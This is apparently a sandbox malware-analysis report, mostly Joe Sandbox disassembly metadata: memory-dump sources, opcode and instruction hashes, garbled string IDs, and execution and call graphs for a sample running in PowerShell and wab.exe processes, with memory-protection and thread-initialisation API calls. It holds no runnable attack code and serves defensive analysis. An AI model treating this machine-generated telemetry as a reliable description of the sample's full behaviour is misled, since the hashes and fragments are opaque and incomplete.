                                                  • Opcode Fuzzy Hash: a8b65c12d837520e8f3327bf7e0130e87ed6bd9093d7b8cc51cf2af579a0c62c
                                                  • Instruction Fuzzy Hash: 56719D70A00209CFDB14DF68C884A9DBBF6FF85315F14852AD515EB791DBB4AC46CB80
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1650565787.0000000004730000.00000040.00000800.00020000.00000000.sdmp, Offset: 04730000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_4730000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 897d8afeb3c7dbc9c825541e33d17d9c4679884be2391461feb1ee0660180565
                                                  • Instruction ID: 57837c1d10229b8c522dd23e00984766b88a175b3108486eb913bb24e0a04bc6
                                                  • Opcode Fuzzy Hash: 897d8afeb3c7dbc9c825541e33d17d9c4679884be2391461feb1ee0660180565
                                                  • Instruction Fuzzy Hash: DC712BB4A00208DFDB14DFA5D884BADBBF2BF88305F148429D511AB791DB75AD4ACF41
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1650565787.0000000004730000.00000040.00000800.00020000.00000000.sdmp, Offset: 04730000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_4730000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 327f1955f3a37dcf0c2db544896c6cd0322a1c72734270bc9cf49ded32f17636
                                                  • Instruction ID: 036c22123954d96c0f6b8025f6090b41f4ec0a58b2deae43b9828c28ab5e23c4
                                                  • Opcode Fuzzy Hash: 327f1955f3a37dcf0c2db544896c6cd0322a1c72734270bc9cf49ded32f17636
                                                  • Instruction Fuzzy Hash: 494159B0A00609DFDB24DFA5C88469DBBF2FF89315F148529D416AB791DBB4AC46CF80
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1650565787.0000000004730000.00000040.00000800.00020000.00000000.sdmp, Offset: 04730000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_4730000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c4c030d16a3840d14d25a1ded9e7c63a381093d4c7fcbe4aef079440c62a1cc6
                                                  • Instruction ID: aaba3756c1fce093aca355e330aa12fe0f97ee188280cd9cbeca4ae7293fdad8
                                                  • Opcode Fuzzy Hash: c4c030d16a3840d14d25a1ded9e7c63a381093d4c7fcbe4aef079440c62a1cc6
                                                  • Instruction Fuzzy Hash: F441BEB1B00604CFDB14DFA4C958AAA7BF2FF88751F084068E506EB7A1CB75AC45CB90
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1650565787.0000000004730000.00000040.00000800.00020000.00000000.sdmp, Offset: 04730000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_4730000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a8412b167e690facd42a70067ba65c69795a8b522ba17b11e2ea3dbbb80d483e
                                                  • Instruction ID: 40de078d4dd942e6328e60381b1086083d87c89509c65707e7f9d980d22cf106
                                                  • Opcode Fuzzy Hash: a8412b167e690facd42a70067ba65c69795a8b522ba17b11e2ea3dbbb80d483e
                                                  • Instruction Fuzzy Hash: 27415A74A106058FCB15CF59C494EAAFBB1FF48310B158599D815AB3A6C736FC91CBA0
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1657785506.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_75a0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9b873e89cde9526f74c73827517f891ab6d2ebfa1375d629300b5a5630dce26b
                                                  • Instruction ID: 7d1d6146ea2da6d16549867731e28ffa61cd76c89603daa92a870c26542ab435
                                                  • Opcode Fuzzy Hash: 9b873e89cde9526f74c73827517f891ab6d2ebfa1375d629300b5a5630dce26b
                                                  • Instruction Fuzzy Hash: 8431A9B4B50204AFE7189B60C954BEE7AA3BBC4380F10C829EA056F7D1CF75DC428B95
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1650565787.0000000004730000.00000040.00000800.00020000.00000000.sdmp, Offset: 04730000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_4730000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fdb1e392658e1312eb80ba55e3df7fa2fc41dc7d169ab2c7b64ffd7a676b5a87
                                                  • Instruction ID: 342bbcc65d070b73a994677d7dfdd1722c842f8d6d44ae25fbb415fc83032fad
                                                  • Opcode Fuzzy Hash: fdb1e392658e1312eb80ba55e3df7fa2fc41dc7d169ab2c7b64ffd7a676b5a87
                                                  • Instruction Fuzzy Hash: AE213EB4A042199FCB10CF98C9809AABBB5FF89310B148196E815EB352C735FD41CBA1
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1650565787.0000000004730000.00000040.00000800.00020000.00000000.sdmp, Offset: 04730000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_4730000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9c27301f62c289cd6c5fcfef0b405322278f6d7c5625ed86e0726fc4ed676488
                                                  • Instruction ID: 9bab6e4de81c45f6fa40113fc3469d276a2b5f6a9c58521a21a3eb5118f8d6f2
                                                  • Opcode Fuzzy Hash: 9c27301f62c289cd6c5fcfef0b405322278f6d7c5625ed86e0726fc4ed676488
                                                  • Instruction Fuzzy Hash: 5D211774A002099FCB10DF98D9809AAFBF1FF89310B14859AE819EB352C735FD41CBA1
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1649870105.000000000459D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0459D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_459d000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d3987f671ad253def71616eb11bd72fbf904b7160a75acf816c0735dfb083af0
                                                  • Instruction ID: ac5443b06a828876b4e2377c6fdefc3034722003ec1b8f645df67f64b57bac6d
                                                  • Opcode Fuzzy Hash: d3987f671ad253def71616eb11bd72fbf904b7160a75acf816c0735dfb083af0
                                                  • Instruction Fuzzy Hash: 3001FC31504304BFEB204E11EC84766BFE8FF41325F18C519DC480B142E279AC49DAB1
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1649870105.000000000459D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0459D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_459d000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1ea321f5dafb44f792c4697879c92b1b8ce1a4b8ead8e19d53c20e52d1caeb88
                                                  • Instruction ID: 32098214aa902f8c3006f62a55543cd6c245d03a8c6e4f9b3984045edf00e2be
                                                  • Opcode Fuzzy Hash: 1ea321f5dafb44f792c4697879c92b1b8ce1a4b8ead8e19d53c20e52d1caeb88
                                                  • Instruction Fuzzy Hash: 11F0C271004340AEEB508E16ED84B62FFE8EB41334F18C15AED480A286C279AC45DAB1
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1650565787.0000000004730000.00000040.00000800.00020000.00000000.sdmp, Offset: 04730000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_4730000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ea2330dacbc1b2ce36567f3f3eb52fc7bf92e8ff85e8b0c410c3801f873d6b0f
                                                  • Instruction ID: 5e5cb0b972a1eb151db558b02f3f14695637eb966e251a0ec646dc58c68ff026
                                                  • Opcode Fuzzy Hash: ea2330dacbc1b2ce36567f3f3eb52fc7bf92e8ff85e8b0c410c3801f873d6b0f
                                                  • Instruction Fuzzy Hash: 5F014435E00509DFCB14CF88D8809ADF7B2FF88324B248658E819A7651C736FC52CB94
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1650565787.0000000004730000.00000040.00000800.00020000.00000000.sdmp, Offset: 04730000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_4730000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bac34acd89dfa807f3214fa06d10960a28187251649351872f9168ca4eca46e1
                                                  • Instruction ID: 252aa342a9898fbc85f86b8e33e3411926cadedbf19ed3fe18e82cbc267c9669
                                                  • Opcode Fuzzy Hash: bac34acd89dfa807f3214fa06d10960a28187251649351872f9168ca4eca46e1
                                                  • Instruction Fuzzy Hash: 3EF05435E001189FCB50CBDCD8509EDF7B6FF8C220B248159E419E3251C736AC52CB50
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1649870105.000000000459D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0459D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_459d000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d8afecd56d675da7da61c7e883f0bfbe6c1dfcd2cccb3fcce8f0eb1b87a0c5d7
                                                  • Instruction ID: 0dd2cd1b71a93cebed5850f650d42ce12d823a846afadef8b77d216c5133baa7
                                                  • Opcode Fuzzy Hash: d8afecd56d675da7da61c7e883f0bfbe6c1dfcd2cccb3fcce8f0eb1b87a0c5d7
                                                  • Instruction Fuzzy Hash: 73210872604240DFDF15DF14D9C4B1ABBB5FB88315F248669D9490B245C33AE81ADB61
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1657785506.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_75a0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'q$4'q$4'q$4'q$$q$$q$$q$$q$$q$$q$$q
                                                  • API String ID: 0-2113266693
                                                  • Opcode ID: a657b1bad8f9b7103eab3d76113c4a38586155e31b63a4e4fdf8dfdf8cb7e71a
                                                  • Instruction ID: c7504cad3902ff8a2646651e253f3b2659a2a3f36bd718af0d00440cf8d8986a
                                                  • Opcode Fuzzy Hash: a657b1bad8f9b7103eab3d76113c4a38586155e31b63a4e4fdf8dfdf8cb7e71a
                                                  • Instruction Fuzzy Hash: 7CD1E5B1B0430AEFDB268E65D4046EE7BA2BF85221F18C87BE8158B251DB35FC45C791
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1657785506.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_75a0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'q$4'q$4'q$4'q$$q$$q$$q$$q$$q$$q
                                                  • API String ID: 0-4104424984
                                                  • Opcode ID: 3e1a77eb73f7fbb6e04c858bcfc888859d4a4d9e1eb3328384f1c21defed78a1
                                                  • Instruction ID: 7371f0a3b2bfd966d095fde5305f3f0074c1108a4f8e68f3edc8dee4534f04f4
                                                  • Opcode Fuzzy Hash: 3e1a77eb73f7fbb6e04c858bcfc888859d4a4d9e1eb3328384f1c21defed78a1
                                                  • Instruction Fuzzy Hash: EFA138B1B0430AAFDB254B6598427EEBBE1BFC6211F1488BBD945CB241DA31D842C7A1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1657785506.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_75a0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'q$4'q$4'q$4'q$tPq$tPq$$q$$q$$q$$q
                                                  • API String ID: 0-3456696661
                                                  • Opcode ID: 94412522c52d5eaa8fe0ad2877cb5a7ed096f35f78d96bbc1f15d2e93f323d87
                                                  • Instruction ID: 2fe16bc146c07388940a4dbb4924df945e98eb0dffcd16e89f3ecf9dcc0c99c0
                                                  • Opcode Fuzzy Hash: 94412522c52d5eaa8fe0ad2877cb5a7ed096f35f78d96bbc1f15d2e93f323d87
                                                  • Instruction Fuzzy Hash: 70A104B1B0060EAFDB249AA5D4017EEBBB2BBC5211F18C47AD9568B281DF31DD42C7D1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1657785506.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_75a0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'q$4'q$$q$$q$$q$$q$$q$$q
                                                  • API String ID: 0-2370149875
                                                  • Opcode ID: 238c614b7f86f458bee167115e6282d8a09fcd2252589c00d074460e64b8ba9d
                                                  • Instruction ID: fbfbd06316b497930fd1aa66880ce12022ba61eca34b2369c2f3a249edf90f86
                                                  • Opcode Fuzzy Hash: 238c614b7f86f458bee167115e6282d8a09fcd2252589c00d074460e64b8ba9d
                                                  • Instruction Fuzzy Hash: 1ED14AB1700203AFCB259B7595116EEBBE2BFC9251B188CBBD905CB351DA31DC46C7A1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1657785506.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_75a0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'q$4'q$4'q$4'q$4'q$4'q
                                                  • API String ID: 0-1794337482
                                                  • Opcode ID: a4690b8ee7e0b605c688e1bb11d99976b197b2b0cdf9831de90f37a36c7d5db4
                                                  • Instruction ID: 78ef874e8056c8a4c1e774a95231cb1a1036cb1522c571b0c48d475888fb4f4c
                                                  • Opcode Fuzzy Hash: a4690b8ee7e0b605c688e1bb11d99976b197b2b0cdf9831de90f37a36c7d5db4
                                                  • Instruction Fuzzy Hash: C7D12EB4A00219DFEB64DF24C954BDEBBB2BB84300F5085E5D9095B785CB35AE82CF91
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1657785506.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_75a0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: XRq$XRq$XRq$tPq$tPq$$q
                                                  • API String ID: 0-422185277
                                                  • Opcode ID: 9f929ccba3bef1ca93f9b9abedfc338ed55e9a9fce75c497c920d5cbb4fa2f81
                                                  • Instruction ID: 46b698977278d7c724ace6c70d66ff3cd0edc24be5479d96c6e6c4aa5a781572
                                                  • Opcode Fuzzy Hash: 9f929ccba3bef1ca93f9b9abedfc338ed55e9a9fce75c497c920d5cbb4fa2f81
                                                  • Instruction Fuzzy Hash: 5361F675B00205AFDB259B6485007AEBBB2BF89211F24C87AE8469F341DB31DD46CBA1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1657785506.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_75a0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'q$tPq$$q$$q$$q
                                                  • API String ID: 0-838716513
                                                  • Opcode ID: aecb618c93a3a1289d491787df92d8df4ca66ccbd855b0264d91be59fe02b4fa
                                                  • Instruction ID: 8303ca8dd78178052200209a691b12de9d1354a841611a11eea25f0b440a430e
                                                  • Opcode Fuzzy Hash: aecb618c93a3a1289d491787df92d8df4ca66ccbd855b0264d91be59fe02b4fa
                                                  • Instruction Fuzzy Hash: BC4104B1A08A4ABFDB258B45C541BEDBBB2BF46220F1885BBD4058F192CB31D840CB91
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1657785506.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_75a0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'q$4'q$$q$$q$$q
                                                  • API String ID: 0-170447905
                                                  • Opcode ID: c6e63ac8b08abe7d3a3cb508e9319f6a2b4c01163cab95992a054a9f2ee3bf99
                                                  • Instruction ID: 25565005576424f3a2635a26b5e1b042547f06b2cea0bfc39f7cb507dcb5fa23
                                                  • Opcode Fuzzy Hash: c6e63ac8b08abe7d3a3cb508e9319f6a2b4c01163cab95992a054a9f2ee3bf99
                                                  • Instruction Fuzzy Hash: 8F3145B6B042B7EFCB214E6598502EEB7E1BF8A111B28887BD85287141DB31E412C761
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1657785506.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_75a0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'q$4'q$$q$$q$$q
                                                  • API String ID: 0-170447905
                                                  • Opcode ID: 71bfce07ddc142a228f1b4dd350401e52b421cf411ff5c5e983b271fa030725e
                                                  • Instruction ID: c54aebb48f22f5ebf953c5c0657586f88e16eadae1a350a187b30086a3c876ad
                                                  • Opcode Fuzzy Hash: 71bfce07ddc142a228f1b4dd350401e52b421cf411ff5c5e983b271fa030725e
                                                  • Instruction Fuzzy Hash: 783158B2724247EFDF254A65A8012FEF7B1BBC5115B28887BED068B141EA3AC847C751
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1657785506.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_75a0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (oq$(oq$(oq$(oq
                                                  • API String ID: 0-3853041632
                                                  • Opcode ID: 9bd30e0ff1f60375d94c8a39b714fad31257c9c5866d550ed09d5ee63c0bdc34
                                                  • Instruction ID: b28ac48db0ded7e3d94a05944043858a0b49c28b6afbdbece771b3c3c0db6fb4
                                                  • Opcode Fuzzy Hash: 9bd30e0ff1f60375d94c8a39b714fad31257c9c5866d550ed09d5ee63c0bdc34
                                                  • Instruction Fuzzy Hash: CEF147B1704316EFDB268F64D814BEEBBA2BF85311F14847BE9158B291CB35E841C7A1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1657785506.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_75a0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'q$4'q$4'q$4'q
                                                  • API String ID: 0-4210068417
                                                  • Opcode ID: cfa0da50a55adeb0d90da034ba6ca84e6f0a22bdecc75f4643f9e75e965acbd2
                                                  • Instruction ID: 84ed73505a16ce4f8b40db1831bdcdafcc836ccb64e66c15e041af291efd023f
                                                  • Opcode Fuzzy Hash: cfa0da50a55adeb0d90da034ba6ca84e6f0a22bdecc75f4643f9e75e965acbd2
                                                  • Instruction Fuzzy Hash: 30E173B4B00309AFE724EB94C550B9EBBB2BF88340F148829D9156FB44DA71EC47CB91
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1657785506.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_75a0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: tPq$tPq$tPq$tPq
                                                  • API String ID: 0-3476066832
                                                  • Opcode ID: cf228317dd459a72bba46a815a7cc7cfd3b164b53af340a5de5e75cb60093f2e
                                                  • Instruction ID: c35fd80263a129c47407ab5b5b7d5454895e358d896c2ef1bb3027d0b4233739
                                                  • Opcode Fuzzy Hash: cf228317dd459a72bba46a815a7cc7cfd3b164b53af340a5de5e75cb60093f2e
                                                  • Instruction Fuzzy Hash: 7291B6B0B00205AFD7258F55C4577AEBBA2BBC9251F18887AE9469B340CB31DD42C7D1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1657785506.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_75a0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'q$4'q$4'q$k
                                                  • API String ID: 0-755445861
                                                  • Opcode ID: 1c72bc9005ea5a3c801c8b7c7f3b549fb9b53fbec1440ed9059eb31e3d7166d3
                                                  • Instruction ID: 176454cf1d38d369620db0ff73ab286f169156ac1e20f5b4ea458249cfb3b82d
                                                  • Opcode Fuzzy Hash: 1c72bc9005ea5a3c801c8b7c7f3b549fb9b53fbec1440ed9059eb31e3d7166d3
                                                  • Instruction Fuzzy Hash: 21A160B4A00219DFEB24DB54C950BDDB7B2BB89304F1084E5D9096B785CB35EE82CFA5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1657785506.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_75a0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $q$$q$$q$$q
                                                  • API String ID: 0-4102054182
                                                  • Opcode ID: 663163f5e3ccc47706c26d61974419a6330d9e0e5e95699894a3fd801fba15ac
                                                  • Instruction ID: 3fe2c2d4c49fed9edb77ab0236382922b851e9fd25b5e475ad0349f835a67999
                                                  • Opcode Fuzzy Hash: 663163f5e3ccc47706c26d61974419a6330d9e0e5e95699894a3fd801fba15ac
                                                  • Instruction Fuzzy Hash: 33214CB63203067BD774152999117ABB796BBC5211F24883BA90DCB3C1ED71E8418361
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1657785506.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_75a0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $q$$q$$q$$q
                                                  • API String ID: 0-4102054182
                                                  • Opcode ID: ab1978fa60d7eaefedca107fb7ed7b063e7f6e1dfc972e31a655b02a955a6832
                                                  • Instruction ID: eaeb73548ff20934e142a9c75bb084db6e1d67029d13640fa56595d96a56c90e
                                                  • Opcode Fuzzy Hash: ab1978fa60d7eaefedca107fb7ed7b063e7f6e1dfc972e31a655b02a955a6832
                                                  • Instruction Fuzzy Hash: 95119DB1A00207FFDB218E69E5416EEB7F5FF89250F18487BD80487201D731E646C7A1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1657785506.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_75a0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'q$4'q$$q$$q
                                                  • API String ID: 0-3199993180
                                                  • Opcode ID: 8b2b448d0e349886f1a5e6fd8a5e87df19dab54fb98af8faaf01fc884fb0f865
                                                  • Instruction ID: 89fffefb1ee9905db7bab2c505736a9214533e578c4f145f1b36405ba58c343a
                                                  • Opcode Fuzzy Hash: 8b2b448d0e349886f1a5e6fd8a5e87df19dab54fb98af8faaf01fc884fb0f865
                                                  • Instruction Fuzzy Hash: D201F76170D78A9FD33B426838211AA6FB1AFC319072E54E7D841CF253C9188C46C3B3

                                                  Execution Graph

                                                  Execution Coverage:0.9%
                                                  Dynamic/Decrypted Code Coverage:55.6%
                                                  Signature Coverage:66.7%
                                                  Total number of Nodes:9
                                                  Total number of Limit Nodes:1
                                                  execution_graph 534 3c32542 537 3c32586 534->537 535 3c325b1 NtProtectVirtualMemory 535->537 536 3c325a4 Sleep 536->534 537->534 537->535 537->536 538 22542c70 LdrInitializeThunk 539 22542c00 541 22542c0a 539->541 542 22542c1f LdrInitializeThunk 541->542 543 22542c11 541->543

                                                  Callgraph

                                                  • Executed
                                                  • Not Executed
                                                  • Opacity -> Relevance
                                                  • Disassembly available
                                                  callgraph 0 Function_224DAB4C 1 Function_03C31DC2 2 Function_22544650 3 Function_224DB14A 4 Function_224DDA46 5 Function_224DCD41 6 Function_224D3F40 7 Function_224D225F 8 Function_224DCF59 9 Function_22544340 10 Function_224DDA5A 11 Function_224DE56F 12 Function_22543D70 13 Function_22542C70 14 Function_224D2860 15 Function_224DD37E 16 Function_22542C60 17 Function_22542B60 18 Function_22542F60 19 Function_224DCD79 20 Function_224D9973 21 Function_22542D10 22 Function_22543010 23 Function_22543D10 24 Function_224DB008 25 Function_224D3F00 26 Function_224D9919 27 Function_22542D00 28 Function_22542C00 30 Function_22542C0A 28->30 29 Function_224DAF15 31 Function_224DD82D 32 Function_22542F30 33 Function_22542E30 34 Function_22542D30 35 Function_224DDD2A 36 Function_224DCC23 37 Function_224D4522 38 Function_224D283D 39 Function_224D9939 40 Function_224DD43A 41 Function_224D3C31 42 Function_224DE432 43 Function_03C32542 43->1 44 Function_224D3BCF 45 Function_22542AD0 46 Function_22542DD0 47 Function_224DC9C1 48 Function_224D1FDC 49 Function_224DB1DC 50 Function_224D1FDF 51 Function_224D3BDE 52 Function_225435C0 53 Function_22542CC0 54 Function_224D3BD9 55 Function_224D3FD5 56 Function_224DAAD5 57 Function_224DB3D5 58 Function_224D3BD4 59 Function_224D1FD7 60 Function_224D1FD2 61 Function_224D3FD2 62 Function_224D1DEC 63 Function_22542DF0 64 Function_22542BF0 65 Function_22542AF0 66 Function_22542CF0 67 Function_224DAAE5 68 Function_224DCDE4 69 Function_224D39E2 70 Function_224DB6FC 71 Function_22542BE0 72 Function_22542EE0 73 Function_22542FE0 74 Function_224D27FA 75 Function_224D3BFA 76 Function_224DAFF7 77 Function_224DD4F2 78 Function_224DDCF2 79 Function_224DE2F2 80 Function_22542F90 81 Function_22543090 82 Function_224DCF89 83 Function_224D9584 84 Function_224DD386 85 Function_224D9B80 86 Function_224DD69C 87 Function_22542B80 88 Function_22542E80 89 Function_22545080 90 Function_224DCC98 91 Function_224D3BAC 92 Function_22542AB0 93 Function_22542DB0 94 Function_22542FB0 95 Function_225439B0 96 Function_224D3BA7 97 Function_224DB4A7 98 Function_224D8FBF 99 Function_22542BA0 100 Function_22542CA0 101 Function_22542EA0 102 Function_22542FA0 103 Function_224DACB5 104 Function_224DCBB4 105 Function_224D3BB1 106 Function_224DB4B2

                                                  Control-flow Graph

                                                  APIs
                                                  • Sleep.KERNELBASE(00000005), ref: 03C325A7
                                                  • NtProtectVirtualMemory.NTDLL(?,-0000101C,-00000018), ref: 03C325FA
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.1843095733.00000000036C7000.00000040.00000400.00020000.00000000.sdmp, Offset: 036C7000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_36c7000_wab.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: MemoryProtectSleepVirtual
                                                  • String ID:
                                                  • API String ID: 3235210055-0
                                                  • Opcode ID: 3d74bdfeea738a0e5ea76d408bf04c1e02f6b524265d85a2fab6ed4d9f3e470a
                                                  • Instruction ID: 60a1e0d0dc77ce85a289de2160aad4f03865d6ab3c714fd30bbcde1722b91660
                                                  • Opcode Fuzzy Hash: 3d74bdfeea738a0e5ea76d408bf04c1e02f6b524265d85a2fab6ed4d9f3e470a
                                                  • Instruction Fuzzy Hash: 83119C724003015FEB01AF79C99C796B7A5AF1A7A2F868584D891CF5F6C3A4CB81CF12

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 13 22542c70-22542c7c LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.1879835691.00000000224D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224D0000, based on PE: true
                                                  • Associated: 00000012.00000002.1879835691.00000000225F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.1879835691.00000000225FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.1879835691.000000002266E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_224d0000_wab.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
